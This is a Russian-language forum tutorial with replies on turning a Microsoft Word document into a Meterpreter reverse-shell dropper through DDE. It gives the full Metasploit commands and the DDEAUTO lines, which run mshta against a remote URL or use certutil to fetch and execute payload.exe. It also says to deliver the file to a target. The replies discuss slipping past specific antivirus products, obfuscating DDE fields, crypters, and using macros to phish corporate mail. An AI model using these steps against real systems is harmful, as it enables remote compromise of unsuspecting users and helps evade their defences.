• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Meterpreter сессия через Microsoft Word

Добрый день.
В двух словах покажу как получить сессию meterpreter используя встроенную функцию Microsoft Office DDE
Почерпнуть немного информации о том что это можно тут:


Информация предоставлена для ознакомления, используйте на свой страх и риск.

Нам понадобится Kali linux и какая-нибудь винда (любая от XP до windows 10) с установленным на нём пакетом microsoft office.

Приступим:
Качаем пакет и копируем его в каталог metasploit
Код:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
cp dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Запускаем metasploit и на всякий обновляем модули
msf > reload_all
msf > use exploit/windows/dde_delivery
Подгружаем полезную нагрузку
msf exploit(dde_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(dde_delivery) > set lhost 192.168.6.30 (тут ваш IP)
msf exploit(dde_delivery) > exploit

Вывод будет следующим:
2017-11-09_14-46-30.png

И нам нужны последние строки, которые мы и вставляем в ворд
У меня это
Код:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.6.30:8080/dOwU9wGE10np3"

Вот гифка куда и как нужно ето воткнуть

Дальнейшие действия понятны: доставляем этот файл на атакуемый компьютер и запускаем
При открытии будут выскакивать различного рода предупреждения, но ничего связанного с безопасностью там не сказано, но некоторые антивирусы уже будут ругаться на файл.
2017-11-09_15-31-31.png


2017-11-09_15-31-54.png


2017-11-09_15-32-14.png


После открытия файла прилетит заветная сессия meterpreter
2017-11-09_14-59-20.png


Многие антивирусы уже реагируют на файл. Проверка на nodistribute.com


rkvTgVliH2mEFy4JLhANd1.png

Спасибо за внимание)
P.S. Первый раз пишу статью на форум, посему наверное немного сумбурная подача)

[doublepost=1510562006,1510226184][/doublepost]Альтернативный код для загрузки файлов, можно использовать не только meterpreter, но и любой продукт для пост-эксплуатации. Empire например

Код:
DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://192.168.0.50/payload.exe && payload"
 

Вложения

  • 2017-11-09_14-27-31.png
    2017-11-09_14-27-31.png
    2,7 КБ · Просмотры: 1 045
  • 2017-11-09_14-31-48.png
    2017-11-09_14-31-48.png
    14,4 КБ · Просмотры: 359
  • 2017-11-09_14-33-55.png
    2017-11-09_14-33-55.png
    19,5 КБ · Просмотры: 301
  • 2017-11-09_14-46-30.png
    2017-11-09_14-46-30.png
    17 КБ · Просмотры: 287
  • 2017-11-09_14-59-20.png
    2017-11-09_14-59-20.png
    31,7 КБ · Просмотры: 320
  • 2017-11-09_15-31-31.png
    2017-11-09_15-31-31.png
    3,4 КБ · Просмотры: 409
  • 2017-11-09_15-31-54.png
    2017-11-09_15-31-54.png
    3,4 КБ · Просмотры: 271
  • 2017-11-09_15-32-14.png
    2017-11-09_15-32-14.png
    3,1 КБ · Просмотры: 287
Последнее редактирование:

adm2

Green Team
05.07.2017
50
120
BIT
0
Аваст и есет от жизни отстали..) Нихрена не видят :) Касперыч глазастый
Любопытно что шестой есет потом всё таки нашёл подозрительную активность в файле, а вот пятый до сих пор слепой котёнок

Если использовать нагрузку, созданную через Veil (про собственные крипторы вообще молчу) и подгрузить её таким образом:
> DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f && payload"
То здесь даже шестой нод ничего не видит.
 
  • Нравится
Реакции: Kalina
O

OneDollar

Любопытно что шестой есет потом всё таки нашёл подозрительную активность в файле, а вот пятый до сих пор слепой котёнок

Если использовать нагрузку, созданную через Veil (про собственные крипторы вообще молчу) и подгрузить её таким образом:
> DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f && payload"
То здесь даже шестой нод ничего не видит.
А что на счет "собственные крипторы" может поделишься ?)
 

adm2

Green Team
05.07.2017
50
120
BIT
0
А что на счет "собственные крипторы" может поделишься ?)
У меня их пока нет, на этой тропе я всего полгода, после того как чуть не поразил WannaCry (спасло то что ПК не смотрели напрямую в инет)
Посему пришлось окунуться в область информационной безопасности поглубже дабы знать где, как, через что, откуда и каким образом может проникнуть какой-нибудь зловред)
 
H

Hackaton192

Есть методы хорошей обфускации DDE-шек, тут на форуме была про них статья! с помощью функции QUOTE, гугл всем в помощь!
 
  • Нравится
Реакции: Underwood
J

JoeBlack0001

Тут можно смело втыкать рекламу криптора =))
 
U

Underwood

Есть методы хорошей обфускации DDE-шек, тут на форуме была про них статья! с помощью функции QUOTE, гугл всем в помощь
Статью можно почитать по ссылке. Кстати, в версиях MSWord не позднее 2007, можно также использовать frames и framesets, которые используются для загрузки произвольного html кода с любой веб-страницы в поле frame документа.
 
O

OneDollar

Статью можно почитать по ссылке. Кстати, в версиях MSWord не позднее 2007, можно также использовать frames и framesets, которые используются для загрузки произвольного html кода с любой веб-страницы в поле frame документа.
Вчера через юникорн создал файл, чекается 10тью антивирусами. Из топовых только касперский. Позор есет и авасту) Может я как-то натупил, но вряд ли. Смотрите:
 
  • Нравится
Реакции: Vertigo и Underwood
H

Hackaton192

Вчера через юникорн создал файл, чекается 10тью антивирусами. Из топовых только касперский. Позор есет и авасту) Может я как-то натупил, но вряд ли. Смотрите:

Думаю все кто в теме давно уже юзают данный инструмент, всем пожалуйста:
https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

На мой взгляд тема с DDE, уступает тем же макросам, так как ПЕРВОЕ уж очень много раз приходится нажать на OK. А ВТОРОЕ с точки соц.инженерии жертва не видит документа и ее сложно заинтересовать(только лишь названием документа получается и то,что в теле письма,если мы рассылаем через e-mail), поэтому я юзаю хорошо обфусцированные макросы(пусть они на известные почтовые сервисы доходят хуже, но на корпоративные почтовики залетают как-надо)
 

shooter

Green Team
25.10.2016
184
146
BIT
0
За статью спасибо! но было бы интереснее узнать что нибудь про CVE-2017-11882
 

adm2

Green Team
05.07.2017
50
120
BIT
0
Здорово, надо было на конкурс !
Какой конкурс =) самое обычное описание стандартного, в скором времени, описания эксплоита)
Вот когда найдёт просвещение, тогда да)
За статью спасибо! но было бы интереснее узнать что нибудь про CVE-2017-11882
С момента комментария вышло две статьи на данную CVE
CVE-2017-11882 или Взлом с помощью безобидного документа
CVE-2017-11882 MS Word Metasploit
 
  • Нравится
Реакции: Сергей Попов
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!